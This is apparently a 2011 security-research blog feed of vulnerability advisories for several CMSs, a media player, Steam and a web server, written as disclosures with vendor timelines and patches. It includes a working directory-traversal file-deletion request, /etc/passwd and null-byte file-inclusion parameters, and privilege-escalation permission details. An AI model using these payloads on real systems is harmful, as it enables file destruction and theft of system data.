Tugux CMS 1.2 (pid) Remote Arbitrary File Deletion Vulnerability

Input passed to the ‘pid’ parameter in administrator/delete_page_parse.php is not properly sanitised before being used to delete files. This can be exploited to delete files with the permissions of the web server via directory traversal sequences passed within the ‘pid’ parameter.

PoC:

——————————

POST /tugux/administrator/delete_page_parse.php HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 175
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=—-x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

——x
Content-Disposition: form-data; name=”pid”

../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../boot.ini
——x–

——————————

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5024.php

2011
07/10
POSTED BY
CATEGORY
Internal
Comments Off

ESTsoft ALPlayer 2.0 ASX Playlist File Handling Buffer Overflow Vulnerability

The vulnerability is caused due to a boundary error in the processing of a playlist file , which can be exploited to cause a stack-based buffer overflow when a user opens e.g. a specially crafted .asx file. Successful exploitation may allow execution of arbitrary code.

————————————————————————-

(188.820): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0095c8e0 ebx=0012e560 ecx=00004141 edx=00ce4fc0 esi=026d1902 edi=0012e5ac
eip=7855c776 esp=0012e458 ebp=0012e468 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246
MSVCR90!_isspace_l+0x3b:
7855c776 0fb70448 movzx eax,word ptr [eax+ecx*2] ds:0023:00964b62=????

————————————————————————-

PoC: alplayer_bof.rar
Advisory ID: ZSL-2011-5023
Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5023.php

2011
07/06
POSTED BY
CATEGORY
Internal
Comments Off

Valve Steam Client Application v1559/1559 Local Privilege Escalation

Steam is vulnerable to an elevation of privileges vulnerability which can be used by a simple user that can change the executable file with a binary of choice. The vulnerability exist due to the improper permissions, with the “F” flag (Full Control) for the “Users” group, for the binary file Steam.exe, GameOverlayUI.exe and steamerrorreporter.exe. The binary (Steam.exe) is set by default to Startup with “-silent” parameter.


C:\Program Files\Steam>cacls Steam.exe
C:\Program Files\Steam\Steam.exe BUILTIN\Users:F <---
NT AUTHORITY\SYSTEM:F
BUILTIN\Power Users:C
BUILTIN\Administrators:F
LABPC\User101:F

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5022.php

2011
06/29
POSTED BY
CATEGORY
Internal
Comments Off

NetServe Web Server v1.0.58 Multiple Remote Vulnerabilities

NetServe Web Server is vulnerable to multiple vulnerabilities including cross-site scripting, remote file inclusion, local file inclusion, script insertion, html injection, denial of service, etc. Given that the software is not maintained anymore and the last update was in 2006, there are still a few that uses it. All the parameters are susceptible to the above attacks. The list of the parameters used by the web application are(post/get):

- Action
- EnablePasswords
- _Checks
- _ValidationError
- ListIndex
- SiteList_0
- SSIErrorMessage
- SSIExtensions
- SSITimeFormat
- SSIabbrevSize
- EnableSSI
- LogCGIErrors
- LoggingInterval
- ExtendedLogging
- CGITimeOut

The tests were made using PowerFuzzer and OWASP ZAP. Attackers can exploit any of the issues using a web browser.

————snip—————
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=http%3A%2F%2Fwww.google.com%2F&ListIndex=0&SiteList_0=DEFAULT
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=%2Fetc%2Fpasswd&_ValidationError=addsitelist.html&ListIndex=0&SiteList_0=DEFAULT
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=%2Fetc%2Fpasswd&ListIndex=0&SiteList_0=DEFAULT
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=addsitelist.html&ListIndex=%2Fetc%2Fpasswd&SiteList_0=DEFAULT
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=addsitelist.html&ListIndex=0&SiteList_0=%2Fetc%2Fpasswd
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=%2Fetc%2Fpasswd%00&_ValidationError=addsitelist.html&ListIndex=0&SiteList_0=DEFAULT
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=%2Fetc%2Fpasswd%00&ListIndex=0&SiteList_0=DEFAULT
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=addsitelist.html&ListIndex=%2Fetc%2Fpasswd%00&SiteList_0=DEFAULT
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=addsitelist.html&ListIndex=0&SiteList_0=%2Fetc%2Fpasswd%00
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=c%3A%5C%5Cboot.ini&_ValidationError=addsitelist.html&ListIndex=0&SiteList_0=DEFAULT
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=c%3A%5C%5Cboot.ini&ListIndex=0&SiteList_0=DEFAULT
coming fromhttp://127.0.0.1/admin/addindex.html
————snip—————

Advisory ID: ZSL-2011-5021
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5021.php

2011
06/23
POSTED BY
CATEGORY
Internal
Comments Off

Sitemagic CMS 2010.04.17 (SMExt) Remote XSS Vulnerability

Sitemagic CMS suffers from a XSS vulnerability when parsing user input to the ‘SMExt’ parameter via GET method in ‘index.php’. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user’s browser session.

Vendor Status
[10.06.2011] Initial contact with the vendor.
[10.06.2011] Vendor replies asking more details.
[10.06.2011] Sent vulnerability details to vendor.
[11.06.2011] Vendor replies.
[12.06.2011] Vendor confirms vulnerability.
[15.06.2011] Asked vendor for scheduled patch release date.
[17.06.2011] No reply from vendor.
[18.06.2011] Sent another e-mail to vendor asking for scheduled patch release date, pointing out the reasonable timeframe for fixing a XSS issue.
[18.06.2011] Vendor says that they will keep me posted when new release is available.
[20.06.2011] Informed the vendor that the advisory release will be on 21st of June.
[21.06.2011] Public security advisory released.

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5020.php

2011
06/21
POSTED BY
CATEGORY
Internal
Comments Off

5 Free Web Security Guides by Veracode

We would love to share these guides with the world. Simple, detailed. Information about the most common web threats and prevention including mobile code security. Thanks Veracode ;)

  • SQL Injection: http://www.veracode.com/security/sql-injection
  • Cross Site Scripting: http://www.veracode.com/security/xss
  • Cross Site Request Forgery: http://www.veracode.com/security/csrf
  • LDAP Injection: http://www.veracode.com/security/ldap-injection
  • Mobile Code Security: http://www.veracode.com/security/mobile-code-security

    • Enjoy reading ;)

    2011
    06/20
    POSTED BY
    CATEGORY
    Internal
    Comments Off

    Multiple vulnerabilities in Pacer Edition CMS

    Pacer Edition CMS suffers from multiple vulnerabilities including cross-site scripting, local file inclusion and arbitrary file deletion. You can view details of the issues on the following advisory links:

    Pacer Edition CMS 2.1 (rm) Remote Arbitrary File Deletion Exploit [ZSL-2011-5017]
    Pacer Edition CMS 2.1 Remote XSS POST Injection Vulnerability [ZSL-2011-5018]
    Pacer Edition CMS 2.1 (l param) Local File Inclusion Vulnerability [ZSL-2011-5019]

    2011
    06/10
    POSTED BY
    CATEGORY
    Internal
    Comments Off

    Vishuddha – Stardust



    2011
    06/02
    POSTED BY
    CATEGORY
    Internal
    Comments Off

    Ushahidi 2.0.1 (range param) SQL Injection Vulnerability (post-auth)

    Input passed via the ‘range’ parameter to dashboard.php is not properly sanitised in application/controllers/admin/dashboard.php before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    ——————————————————————————–

    /application/controllers/admin/dashboard.php
    —————-
    103: // Set the date range (how many days in the past from today?)
    104: // default to one year
    105: $range = (isset($_GET['range'])) ? $_GET['range'] : 365;
    106:
    107: if(isset($_GET['range']) AND $_GET['range'] == 0)
    108: {
    109: $range = NULL;
    110: }
    111:
    112: $this->template->content->range = $range;

    ——————————————————————————–

    Vendor releases patch:

    - $range = (isset($_GET['range']) AND preg_match(‘/^[1-9](\d{0,2})$/’, $_GET['range']) > 0)

    + $range = (isset($_GET['range']) AND preg_match(‘/^\d+$/’, $_GET['range']) > 0)

    Advisory details: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5016.php

    Vendor: http://dev.ushahidi.com/issues/show/2195
    https://github.com/ushahidi/Ushahidi_Web/commit/5721b6a063bc3143a4562a78c8efb29a0f18b20b

    be with zero worries :P

    2011
    06/02
    POSTED BY
    CATEGORY
    Internal
    Comments Off

    Kentico CMS 5.5R2.23 and bellow XSS POST Injection Vulnerability + Fix

    Kentico CMS suffers from a XSS vulnerability when parsing user input to the ‘userContextMenu_parameter’ parameter via POST method in ‘/examples/webparts/membership/users-viewer.aspx’. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user’s browser session.

    Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5015.php

    Vendor patch: http://devnet.kentico.com/Bugtracker/Hotfixes.aspx

    t00t!

    2011
    05/31
    POSTED BY
    CATEGORY
    Internal
    Comments Off

    Rete Mirabilia

    Site Meter